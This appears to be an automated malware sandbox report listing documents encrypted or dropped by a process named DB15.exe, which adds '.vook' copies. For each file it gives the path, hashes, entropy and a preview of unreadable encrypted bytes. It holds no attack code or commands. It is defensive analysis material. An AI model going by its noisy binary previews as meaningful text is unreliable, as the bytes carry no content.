                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.821967926203389
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:PuQXwVw5ii/eRf1LCKpoFsRuqnToETj+b1s4TUUS2SOtqTUFCywPNGbK4VniTkbD:2hTRfno0D3j+XTUUtSOtqTozw1GWWiiD
                                                                                                                                                                                                                                      MD5:C4572329C5FB5ED2C8785E9FFE3F7160
                                                                                                                                                                                                                                      SHA1:92A1F0A31CC93E8E9788C90BD98F3A5CA7A4AACC
                                                                                                                                                                                                                                      SHA-256:3A44AD08370E3695D1D4427BE96162077CC086A6416F3EAD761EC99C9205337A
                                                                                                                                                                                                                                      SHA-512:0936F646FE75B4EF6553A96FC677002677853239757D8E9BC36996498091200A123AF55DAE6856CF02780F03675EBCAAF02ACE25B92A872E88FFEFB4EDE27234
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXC...N....#....W.`c.....>.-t..d..7.N{.......;..6.D..<.0k.,.Td.....W&p<..n.....F.S.....f.M...N.!R...a...~.....X..gb..._....0..#...!..&..j.Y...9|.fX.<.bKCz...j.....a.pF..S..LT<...7.,..+GR$.d.x....B..T. ..3.=.p...2.AprH...YP;...,d....K.M!T...E.r...kg...A.:...hU..X?C..y.0..?.oX.$..rr. .f..r..wF...F...u.).y...u......';...].....y.....`.....v.....A...h...C...(..........Z.D..'.r...z..:o...u.{...,..U........00....mB.....6!.2.qjw.~.v.S.Q....).6...$...Ll:.k%,..J..............)M../..R...........hE.58..1......u.-.~..w.}....s.+.....w.2.....IP...t.s.J.....U......o]..U'..$}|C.5.....#^d..-.@ok/..c.i.........jr'`}a........ .....Q.%@8(w......_......J.Gl.+.(....v~...#....y...?n%%...u...Edp..l..5.......]....Y.+.^=.mX...G..p.#Jt+6..Wa..f;l.y....f..9...<....>..u....D..U.....}(..6..?..M..)\)#..k......i.2X!..=.....7X.YN.o~-..:&..-.2U....N.A.Dy.;....Y..]..B_/..../.<.....W.$...=..y..@..3...6....||...~.....*f5..........*...?NN.T.l...m.2j:t..\.d.a....>.1

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.821967926203389
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:PuQXwVw5ii/eRf1LCKpoFsRuqnToETj+b1s4TUUS2SOtqTUFCywPNGbK4VniTkbD:2hTRfno0D3j+XTUUtSOtqTozw1GWWiiD
                                                                                                                                                                                                                                      MD5:C4572329C5FB5ED2C8785E9FFE3F7160
                                                                                                                                                                                                                                      SHA1:92A1F0A31CC93E8E9788C90BD98F3A5CA7A4AACC
                                                                                                                                                                                                                                      SHA-256:3A44AD08370E3695D1D4427BE96162077CC086A6416F3EAD761EC99C9205337A
                                                                                                                                                                                                                                      SHA-512:0936F646FE75B4EF6553A96FC677002677853239757D8E9BC36996498091200A123AF55DAE6856CF02780F03675EBCAAF02ACE25B92A872E88FFEFB4EDE27234
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXC...N....#....W.`c.....>.-t..d..7.N{.......;..6.D..<.0k.,.Td.....W&p<..n.....F.S.....f.M...N.!R...a...~.....X..gb..._....0..#...!..&..j.Y...9|.fX.<.bKCz...j.....a.pF..S..LT<...7.,..+GR$.d.x....B..T. ..3.=.p...2.AprH...YP;...,d....K.M!T...E.r...kg...A.:...hU..X?C..y.0..?.oX.$..rr. .f..r..wF...F...u.).y...u......';...].....y.....`.....v.....A...h...C...(..........Z.D..'.r...z..:o...u.{...,..U........00....mB.....6!.2.qjw.~.v.S.Q....).6...$...Ll:.k%,..J..............)M../..R...........hE.58..1......u.-.~..w.}....s.+.....w.2.....IP...t.s.J.....U......o]..U'..$}|C.5.....#^d..-.@ok/..c.i.........jr'`}a........ .....Q.%@8(w......_......J.Gl.+.(....v~...#....y...?n%%...u...Edp..l..5.......]....Y.+.^=.mX...G..p.#Jt+6..Wa..f;l.y....f..9...<....>..u....D..U.....}(..6..?..M..)\)#..k......i.2X!..=.....7X.YN.o~-..:&..-.2U....N.A.Dy.;....Y..]..B_/..../.<.....W.$...=..y..@..3...6....||...~.....*f5..........*...?NN.T.l...m.2j:t..\.d.a....>.1

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8300043144878275
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:rhnYiX6drJ70X03Lbf1Xz8CCcEdGzmzNpiCALMmymGoWF8JCGik8f/uGix+iTkbD:pFX6drJAXur1D8RomRp9AbdJL7x7iD
                                                                                                                                                                                                                                      MD5:EB287F5984816A68DB24BCF63C5A8F84
                                                                                                                                                                                                                                      SHA1:F58A09FB2700E02B82753DCE63A3D9FBBA03B45C
                                                                                                                                                                                                                                      SHA-256:6424351D72079C1B568157B2DA4E4F2B4FDD23B52BB35BA21862F48DCEB85EDB
                                                                                                                                                                                                                                      SHA-512:0BA61E457DE1FB0496AD37CD96BAFE2D2B05319905B8185F301C652295B4F2AC0EF0F655E9CBD0EF9680F8F37420789B7F6ED7C4AFC06F25B5655AECE3138409
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXC....;...i.*.9..`...h..$/B$......:..o.h..0{^.,.n....D...`.^0?.,(..z2....I_. .K6.......5Z..N.1.Z....b".....K.Kj.v...v.B.&.......9..4w....XH8.....a....s.p........._.U..z......D....&...8..q{..m.Q..i.!uZ......w...z|@...%X5....;Z(]A.3.~.l.a.'..$C.^..{..~....g~..[xd..*T.T.ro.2.f)..v.....C...J.1Z.qu.=./.1.=...6..3..................;<......2.....g...7..../.YOh.+.c.......8M.O......Ht..oC...%.x..E.4.u.....9....y.5./...._.h"$.O"..G..R.N!..EF.7..n.(.~H..@9$.f.x'@/M...6..1?.l@=..PU...n.A..z..9.D.....}`.m%8D.e.<<.$..|.OB.=.....G.t.j.wAl.\!.8..[|........0..h..x%..B\8R:.'.jzz.W..v.+a..h.4..a`j..js....r.6.....0X....@.z..e....]..._.8.i.....]g.ha\..]......&.Jh0.VK...M.e.r.T.tj...-....<....U.>_Q3D.;..|]..j...2..c...w.b M.V3.....+...V....x...].....F..p.`....e....>.z;.?3.H.cX....3O^R.~.c..k\-.#./.9..i0.....c.2q....[./~...?0......V...U..U..WL.Dj....}..!.V..V..GR.d.I...\..U.y.U...-...............T..f'.bW....r.v.._'.s.........D...7O...D...{..\...........w..

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8300043144878275
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:rhnYiX6drJ70X03Lbf1Xz8CCcEdGzmzNpiCALMmymGoWF8JCGik8f/uGix+iTkbD:pFX6drJAXur1D8RomRp9AbdJL7x7iD
                                                                                                                                                                                                                                      MD5:EB287F5984816A68DB24BCF63C5A8F84
                                                                                                                                                                                                                                      SHA1:F58A09FB2700E02B82753DCE63A3D9FBBA03B45C
                                                                                                                                                                                                                                      SHA-256:6424351D72079C1B568157B2DA4E4F2B4FDD23B52BB35BA21862F48DCEB85EDB
                                                                                                                                                                                                                                      SHA-512:0BA61E457DE1FB0496AD37CD96BAFE2D2B05319905B8185F301C652295B4F2AC0EF0F655E9CBD0EF9680F8F37420789B7F6ED7C4AFC06F25B5655AECE3138409
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXC....;...i.*.9..`...h..$/B$......:..o.h..0{^.,.n....D...`.^0?.,(..z2....I_. .K6.......5Z..N.1.Z....b".....K.Kj.v...v.B.&.......9..4w....XH8.....a....s.p........._.U..z......D....&...8..q{..m.Q..i.!uZ......w...z|@...%X5....;Z(]A.3.~.l.a.'..$C.^..{..~....g~..[xd..*T.T.ro.2.f)..v.....C...J.1Z.qu.=./.1.=...6..3..................;<......2.....g...7..../.YOh.+.c.......8M.O......Ht..oC...%.x..E.4.u.....9....y.5./...._.h"$.O"..G..R.N!..EF.7..n.(.~H..@9$.f.x'@/M...6..1?.l@=..PU...n.A..z..9.D.....}`.m%8D.e.<<.$..|.OB.=.....G.t.j.wAl.\!.8..[|........0..h..x%..B\8R:.'.jzz.W..v.+a..h.4..a`j..js....r.6.....0X....@.z..e....]..._.8.i.....]g.ha\..]......&.Jh0.VK...M.e.r.T.tj...-....<....U.>_Q3D.;..|]..j...2..c...w.b M.V3.....+...V....x...].....F..p.`....e....>.z;.?3.H.cX....3O^R.~.c..k\-.#./.9..i0.....c.2q....[./~...?0......V...U..U..WL.Dj....}..!.V..V..GR.d.I...\..U.y.U...-...............T..f'.bW....r.v.._'.s.........D...7O...D...{..\...........w..

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN\BNAGMGSPLO.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.852479748219383
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:vcuODhTnayqT4P8Y+Hmv7RJwt9uidr+7wPJharFmt4Kb80kCWVtYM3MiTkbD:U1+r4EY+HOO/xdYwhQs8thiM1iD
                                                                                                                                                                                                                                      MD5:32F1FF0AE3C9D998F26A3D64D6BCD1AE
                                                                                                                                                                                                                                      SHA1:29B34E6BEE174E4CE7A80114BEB6CCE3983C2281
                                                                                                                                                                                                                                      SHA-256:EC0789337F4C0E29320F9E1CFF46633E46E857F60D447525204AD09362F1A5E0
                                                                                                                                                                                                                                      SHA-512:EF2E862F2BC01BD2661B7CB01CA42C5FC8FB5808149E4E8932F8DE2552D5E9E3117653FA6E5123E1454EAF42311BC6D01340071095F56F6C561970D0FEB25836
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:BNAGM...(..=czrw..<m.......d.\..<pl.gW...q...."..c...7S....-;.`.....u.{...vO.E..L?.G7./.~.P....E..8.;.ZoQ..Y1b../.|..z...oy.H.p.....^x}.Q(\(.U.!..Ji..}@...~a.x1.....P.....m........({.Z....._..#O..!/..."..B..W.P.."w;A..y...[.{0?0;.,..t .$Q...e.#...s..*U.H.\.Q...R*Q........a..0P\H..x!$..Q(u.&.....l....e-.$i;...3..33.)Q(.aP..`.+...4T.B..qjL.b..|...AZ.Dw{.......\.-..]...R~... .j..8.g..oQ....{mN...eZ.Z{..w...@.q...#.[J}...b):...M .'.4...>uP+H#L.K,.d5.8.J...G+..|.....{9.R.|.[..!....a..o.}.4.4.1.t7w.=$^.D.....eT.;..G..f.+.[".t...8..............jl.|.....m^.....&i]{...M...|..._.}..0*`...k.U"fNX.g...o.2..)-<....yd.D ...f#<..2.<FB........2|...F.........;......2.O.....Z..`xPW0L...P...L....b..T....-.j...s0......$.E.-i...r..cV.j..(3.....Dx...L.9\...^_.3.T.6`].%...s...H|>..g.....).M.j.N8.*W..@.B....7.).=.N....TKS.m7."|#.*t..<U..h.....>fNt[..P0L..#O.....I.....j...:..s.0p..nb.)/...XY.j.^A...e..y.Xv.)G.O..NbI0%R.!..(.0....j.+&1...o.U. ..y7..33...^r.@......

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN\BNAGMGSPLO.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.852479748219383
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:vcuODhTnayqT4P8Y+Hmv7RJwt9uidr+7wPJharFmt4Kb80kCWVtYM3MiTkbD:U1+r4EY+HOO/xdYwhQs8thiM1iD
                                                                                                                                                                                                                                      MD5:32F1FF0AE3C9D998F26A3D64D6BCD1AE
                                                                                                                                                                                                                                      SHA1:29B34E6BEE174E4CE7A80114BEB6CCE3983C2281
                                                                                                                                                                                                                                      SHA-256:EC0789337F4C0E29320F9E1CFF46633E46E857F60D447525204AD09362F1A5E0
                                                                                                                                                                                                                                      SHA-512:EF2E862F2BC01BD2661B7CB01CA42C5FC8FB5808149E4E8932F8DE2552D5E9E3117653FA6E5123E1454EAF42311BC6D01340071095F56F6C561970D0FEB25836
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:BNAGM...(..=czrw..<m.......d.\..<pl.gW...q...."..c...7S....-;.`.....u.{...vO.E..L?.G7./.~.P....E..8.;.ZoQ..Y1b../.|..z...oy.H.p.....^x}.Q(\(.U.!..Ji..}@...~a.x1.....P.....m........({.Z....._..#O..!/..."..B..W.P.."w;A..y...[.{0?0;.,..t .$Q...e.#...s..*U.H.\.Q...R*Q........a..0P\H..x!$..Q(u.&.....l....e-.$i;...3..33.)Q(.aP..`.+...4T.B..qjL.b..|...AZ.Dw{.......\.-..]...R~... .j..8.g..oQ....{mN...eZ.Z{..w...@.q...#.[J}...b):...M .'.4...>uP+H#L.K,.d5.8.J...G+..|.....{9.R.|.[..!....a..o.}.4.4.1.t7w.=$^.D.....eT.;..G..f.+.[".t...8..............jl.|.....m^.....&i]{...M...|..._.}..0*`...k.U"fNX.g...o.2..)-<....yd.D ...f#<..2.<FB........2|...F.........;......2.O.....Z..`xPW0L...P...L....b..T....-.j...s0......$.E.-i...r..cV.j..(3.....Dx...L.9\...^_.3.T.6`].%...s...H|>..g.....).M.j.N8.*W..@.B....7.).=.N....TKS.m7."|#.*t..<U..h.....>fNt[..P0L..#O.....I.....j...:..s.0p..nb.)/...XY.j.^A...e..y.Xv.)G.O..NbI0%R.!..(.0....j.+&1...o.U. ..y7..33...^r.@......

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN\GAOBCVIQIJ.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.834702300358717
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:A9tchf2BuYXFNZbsbuAsNu7CSlh21PON/YS0IWiTkbD:8tcR2BZX+bv5DwFOlf0ITiD
                                                                                                                                                                                                                                      MD5:F82B952E628C73053BE6E03BFD5233BF
                                                                                                                                                                                                                                      SHA1:E0B8AADDAE60B9B68E3519E36A0A20071D05E614
                                                                                                                                                                                                                                      SHA-256:8CC4B9A2718685B7D9F3BF90C02C9E204265AECA318D3DD1ED7BEB0B867C4539
                                                                                                                                                                                                                                      SHA-512:2E46EF293B1D8A811A3A3A506688BEA7E70483AEF9CCA0E673D4EDF0DC5CC9349C77AE460A9099FE00A0A4FB969A3D9BE0A308C50CC2128388A061F54D544C26
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GAOBC.L.......^.7(......d.@.....P..n.G|..D.H....A}......K...E.w..n.K.at`..0`..^.......e.p[.u.;...=.....TR.m.8..E.....6.{..p..._d.....R..}.Y.F...w.....M.R.b..7.L..6!.=.v...E..W....&.y..K.I9...d..v\x..fw.s..d..........%.w.K..h+...b...B.^.=..y...*.. w.tTQ;.U.....r....:..\..T.....a...A.O..Qh.hB.7X..u..B....PD.:.....J.;RX..o6..q..3.g....{..2...e.**.:......P.?.A..'.V...~....r..,AB...2..=.t......E.... .{.......a5T...^yK<.T.;EiEQ.....skqX.d.9..f..X..D..-r.u....W.......+.u...&...C4.....n....Xy. ..SRg...-.}qJ...b..wM......R..+j.G=........B..#. . .7..q...Xr.S..y5..s..{..f..nz.x..*3f.....;.....\.._..$WW...n.mtP.p/.2C..cO....+.....2~.D+q...C(.....#r.. ...c..<.ST\......0.q......H..qw..>.....gq%p....73....n-.....`.*$..O+.f......."+u...c$.$c...G..y.;.h$...I...1x...o....\\.....Q..d...._S1...a..t..}....._=.H ..D^......V.J_M.3'8.Z.~q.-.LV...ra.#.U..sr.0.<.Iy....8..jD.7..t[5n5....@D......I..=...(7"F:.....N..8....,..m.....:.d6P.Q..:.3........t0...

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN\GAOBCVIQIJ.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.834702300358717
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:A9tchf2BuYXFNZbsbuAsNu7CSlh21PON/YS0IWiTkbD:8tcR2BZX+bv5DwFOlf0ITiD
                                                                                                                                                                                                                                      MD5:F82B952E628C73053BE6E03BFD5233BF
                                                                                                                                                                                                                                      SHA1:E0B8AADDAE60B9B68E3519E36A0A20071D05E614
                                                                                                                                                                                                                                      SHA-256:8CC4B9A2718685B7D9F3BF90C02C9E204265AECA318D3DD1ED7BEB0B867C4539
                                                                                                                                                                                                                                      SHA-512:2E46EF293B1D8A811A3A3A506688BEA7E70483AEF9CCA0E673D4EDF0DC5CC9349C77AE460A9099FE00A0A4FB969A3D9BE0A308C50CC2128388A061F54D544C26
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GAOBC.L.......^.7(......d.@.....P..n.G|..D.H....A}......K...E.w..n.K.at`..0`..^.......e.p[.u.;...=.....TR.m.8..E.....6.{..p..._d.....R..}.Y.F...w.....M.R.b..7.L..6!.=.v...E..W....&.y..K.I9...d..v\x..fw.s..d..........%.w.K..h+...b...B.^.=..y...*.. w.tTQ;.U.....r....:..\..T.....a...A.O..Qh.hB.7X..u..B....PD.:.....J.;RX..o6..q..3.g....{..2...e.**.:......P.?.A..'.V...~....r..,AB...2..=.t......E.... .{.......a5T...^yK<.T.;EiEQ.....skqX.d.9..f..X..D..-r.u....W.......+.u...&...C4.....n....Xy. ..SRg...-.}qJ...b..wM......R..+j.G=........B..#. . .7..q...Xr.S..y5..s..{..f..nz.x..*3f.....;.....\.._..$WW...n.mtP.p/.2C..cO....+.....2~.D+q...C(.....#r.. ...c..<.ST\......0.q......H..qw..>.....gq%p....73....n-.....`.*$..O+.f......."+u...c$.$c...G..y.;.h$...I...1x...o....\\.....Q..d...._S1...a..t..}....._=.H ..D^......V.J_M.3'8.Z.~q.-.LV...ra.#.U..sr.0.<.Iy....8..jD.7..t[5n5....@D......I..=...(7"F:.....N..8....,..m.....:.d6P.Q..:.3........t0...

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN\MXPXCVPDVN.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.827676310937996
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:8gBSGZS0kGLo1cfZpcT9fQUenQQfPxRskAQETOlJAWvXoq/iTkbD:PBSGZFBKT94NQQf/ulY2MX1aiD
                                                                                                                                                                                                                                      MD5:718266CCF9C218B17530788A2466E869
                                                                                                                                                                                                                                      SHA1:E1B5574866AD990C8AA5FAEFA83A976FFEA97F11
                                                                                                                                                                                                                                      SHA-256:D3EE0A7E904290D8CB54007FE0A785C74C7C4F856DD76FB3196834B0DDB9BE9E
                                                                                                                                                                                                                                      SHA-512:3807C926D039FDDF755E3068AE34EB5B551C90D4021711412ADC97CA3B4D83D8BF445647D40536597F88C50875BDD1F4FB87CFEA1612C7C607E9994337F6B3D1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXC..O....2...e.(....?...`0..$:.T.]L=.s...5.B.4.$W..K.[b.j...g.Q...S.. .....,$.G....=...e....,\iG...f..'nYX..._...<...M..9...q.c8h.).E..r...r.Fu..>../.......Tp..;.......,.B...S..coO..z...M.....'..&..7..PR....m...t.....].p].dUl.t.'.w.E2x.E}7..hd..O....j.sjg[....-..M-l..l.Ba.....6.^.R...%t.&Zr7.E......1(>.....l>.d!|.D..|...&..?..=D.u.8.>.C....Pt3..G.......cn.~.5J...#H.........b0......{.._...K.i..#.7.....]..mQ.n...j$.>...4t.O..;Z....[..LR%.,Z.D-.^.....2..&\.E.....#.~S.^.M..@..h..\..H.s...t........"G.*mZz.;.....%[.44m.w"Cc9...........}. .N....L2,.....`5J..,.l..e...~.9tXw..l.i..f..p........).5....T.5....o8..q...... ......V.P.w.o..........^41.... ..?/US.....P..."u.]o....!....5....4K....B..|..d82....v.L.vy].[......Ff. ../....E5.....r.J..}7S6.v!PO..c...Z."Y..u..A..C.......M....#.S..M.......I..FT.rg...@..8l...l.l..)...j.t..`.l.K89/..O.9@.'.|..49.pZ...P7iu...V...FiC[..}V\m.X>'.........J.p*.$.~...}@......j..A.....9.{5..sw.Q.v..L

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN\MXPXCVPDVN.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.827676310937996
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:8gBSGZS0kGLo1cfZpcT9fQUenQQfPxRskAQETOlJAWvXoq/iTkbD:PBSGZFBKT94NQQf/ulY2MX1aiD
                                                                                                                                                                                                                                      MD5:718266CCF9C218B17530788A2466E869
                                                                                                                                                                                                                                      SHA1:E1B5574866AD990C8AA5FAEFA83A976FFEA97F11
                                                                                                                                                                                                                                      SHA-256:D3EE0A7E904290D8CB54007FE0A785C74C7C4F856DD76FB3196834B0DDB9BE9E
                                                                                                                                                                                                                                      SHA-512:3807C926D039FDDF755E3068AE34EB5B551C90D4021711412ADC97CA3B4D83D8BF445647D40536597F88C50875BDD1F4FB87CFEA1612C7C607E9994337F6B3D1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXC..O....2...e.(....?...`0..$:.T.]L=.s...5.B.4.$W..K.[b.j...g.Q...S.. .....,$.G....=...e....,\iG...f..'nYX..._...<...M..9...q.c8h.).E..r...r.Fu..>../.......Tp..;.......,.B...S..coO..z...M.....'..&..7..PR....m...t.....].p].dUl.t.'.w.E2x.E}7..hd..O....j.sjg[....-..M-l..l.Ba.....6.^.R...%t.&Zr7.E......1(>.....l>.d!|.D..|...&..?..=D.u.8.>.C....Pt3..G.......cn.~.5J...#H.........b0......{.._...K.i..#.7.....]..mQ.n...j$.>...4t.O..;Z....[..LR%.,Z.D-.^.....2..&\.E.....#.~S.^.M..@..h..\..H.s...t........"G.*mZz.;.....%[.44m.w"Cc9...........}. .N....L2,.....`5J..,.l..e...~.9tXw..l.i..f..p........).5....T.5....o8..q...... ......V.P.w.o..........^41.... ..?/US.....P..."u.]o....!....5....4K....B..|..d82....v.L.vy].[......Ff. ../....E5.....r.J..}7S6.v!PO..c...Z."Y..u..A..C.......M....#.S..M.......I..FT.rg...@..8l...l.l..)...j.t..`.l.K89/..O.9@.'.|..49.pZ...P7iu...V...FiC[..}V\m.X>'.........J.p*.$.~...}@......j..A.....9.{5..sw.Q.v..L

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN\NEBFQQYWPS.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.851637188701298
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:YqlxamOyIWiyELzBm6yZq0qDk48qKKNfJYdC5PSJ7iTkbD:tamOzWiyebOH48qNiSSJuiD
                                                                                                                                                                                                                                      MD5:9E7E43BCE67B13580F7E20F62D156E72
                                                                                                                                                                                                                                      SHA1:85A062FE541CDBC6A6B143174B425CABEF5C67C4
                                                                                                                                                                                                                                      SHA-256:6D0261785EA94D393BBE53FCC9DCD9EE84EF7E8362D09797D67EF8650E71E797
                                                                                                                                                                                                                                      SHA-512:6D6D9317A14A7D69203D6971A6E55C391A7A1205CF53313B8E67597FA45AC81228086C71A7B98803960F1DED3B80D9C090D67529D981ACD1F240C720D0704012
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQz.........0[...-rv9.n.P..cM8..Da.VS>....@.....e8.]..I..;.'5.....r....'......j.xnl3.R'..!....p..q^'TE/>h...+.a.e....<...x..3...a.J.?.....~.,....QC.^f.X......6Bv@...aO=O......zJ.zkZ}.&..}.gp.....". }....IB.a............).j..'...:z=.D..Q......#....{#~F..U8.e.....t.9w!b9t^.....v.L.9nn|....R>...%.sqM.~....}.s..y>..[.u/.../W."..9x..5..p...k.7.1Q...YP...........y.... .wO8-.N[.hN.v..S..p-.8.K..x..[.V.:.{.af.E{<-.U."k.....A.Pq.IZ.(.......Vv.U,t@..Z.z......:..P...H7..:.......,..(..+Gq.wP.C..e5._..x\.%#3x..S... .R.u(m,...."..+'s;.W.;... n6H...Ag...=8.8.T%J...k%...j..x....3%..J..|.7....,Oe.A...4..U[&i.]I..Q;.. }..}.`.@.g6.%f9Q+j.......<.I..P..Q$g........2........|....U...P.3....)..._...i.3'/.P.m.@.....v...b..#|J..N..mG...C..u.;..m.i...Vs2..Uv%..NZFt.@`.S..e......8s.....;...X.qo.(%:.o.5!.X..x.fz:@..U{.u/w'..H...(..7f..5T^U)rx.tE..O.Y~.....)...Se2._L......8.j:.P......X......\_K...:....nG..6:qPg@T..E.M.Z.5...C.r.~..1>K.dN.0..WE..W..2.v.sG.3\....

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN\NEBFQQYWPS.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.851637188701298
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:YqlxamOyIWiyELzBm6yZq0qDk48qKKNfJYdC5PSJ7iTkbD:tamOzWiyebOH48qNiSSJuiD
                                                                                                                                                                                                                                      MD5:9E7E43BCE67B13580F7E20F62D156E72
                                                                                                                                                                                                                                      SHA1:85A062FE541CDBC6A6B143174B425CABEF5C67C4
                                                                                                                                                                                                                                      SHA-256:6D0261785EA94D393BBE53FCC9DCD9EE84EF7E8362D09797D67EF8650E71E797
                                                                                                                                                                                                                                      SHA-512:6D6D9317A14A7D69203D6971A6E55C391A7A1205CF53313B8E67597FA45AC81228086C71A7B98803960F1DED3B80D9C090D67529D981ACD1F240C720D0704012
                                                                                                                                                                                                                                      Malicious:false
